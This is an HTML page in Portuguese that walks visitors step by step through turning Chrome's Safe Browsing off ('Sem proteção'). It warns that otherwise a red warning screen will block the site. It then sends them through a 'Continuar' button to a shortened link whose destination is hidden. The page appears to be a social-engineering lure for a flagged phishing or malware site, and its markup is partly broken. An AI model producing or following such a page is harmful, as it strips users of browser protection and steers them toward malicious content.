<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1.0">

	<title>Site</title>
<script src="https://kit.fontawesome.com/cd4f4a26e9.js" crossorigin="anonymous"></script>
		<style>
		body {
			background-color: #f8f8f8;
			font-family: 'Helvetica Neue', sans-serif;
			font-size: 16px;
			color: #333;
		}

		h1 {
			font-size: 28px;
			color: #333;
			margin: 40px 0 20px;
			text-align: center;
		}

		p {
			line-height: 1.5;
			margin-bottom: 10px;
		}

		i {
			font-size: 24px;
			color: #333;
			margin: 0 8px;
		}

		.step {
			display: flex;
			align-items: center;
			margin-bottom: 20px;
		}

		.step-number {
			width: 40px;
			height: 40px;
			background-color: #333;
			color: #fff;
			border-radius: 50%;
			display: flex;
			justify-content: center;
			align-items: center;
			font-weight: bold;
			margin-right: 20px;
		}

		.arrow-up:before {
			content: "\f062";
		}

		.arrow-down:before {
			content: "\f063";
		}
	</style>
</head>
<body>
	<h1>Para vizualizar desative a navegação segura do Google Chrome</h1>

	<div class="step">
	  <div class="step-number">1</div>
	  <div class="step-description">Abra o Google Chrome.</div>
	  <i class="fas arrow-up"></i>
	</div>

	<div class="step">
	  <div class="step-number">2</div>
	  <div class="step-description">Clique nos três pontos no canto superior direito da tela.</div>
	  <i class="fas arrow-up"></i>
	</div>

	<div class="step">
	  <div class="step-number">3</div>
	  <div class="step-description">Selecione "Configurações".</div>
	  <i class="fas arrow-up"></i>
	</div>

	<div class="step">
	  <div class="step-number">4</div>
	  <div class="step-description">Clique em "Privacidade e segurança".</div>
	  <i class="fas arrow-down"></i>
	</div>

	<div class="step">
	  <div class="step-number">5</div>
	  <div class="step-description">Clique em "Navegação segura".</div>
	  <i class="fas arrow-down"></i>
	</div>
	
	<div class="step">
	<div class="step-number">6</div>
	<div class="step-description">Desative a opção "Proteção Padrão" para "Sem proteção".</div>
	<i class="fas arrow-down"></i>
	</div>
	
	<div class="step">
	<div
	<i>após ter desativado clique em continuar,<br>
	importante: caso não tenha desativado irá aparecer a tela vermelha impossibilitando de abrir o site</i></div>
	
	<br>
	<a href="https://encurtador.com.br/bvFJ8" target="_blank">
<br>	<button style="background-color: red; color: white; padding: 20px 40px; border: none; border-radius: 5px;">Continuar</button>
	</a>
	</div>
	
</body>
</html>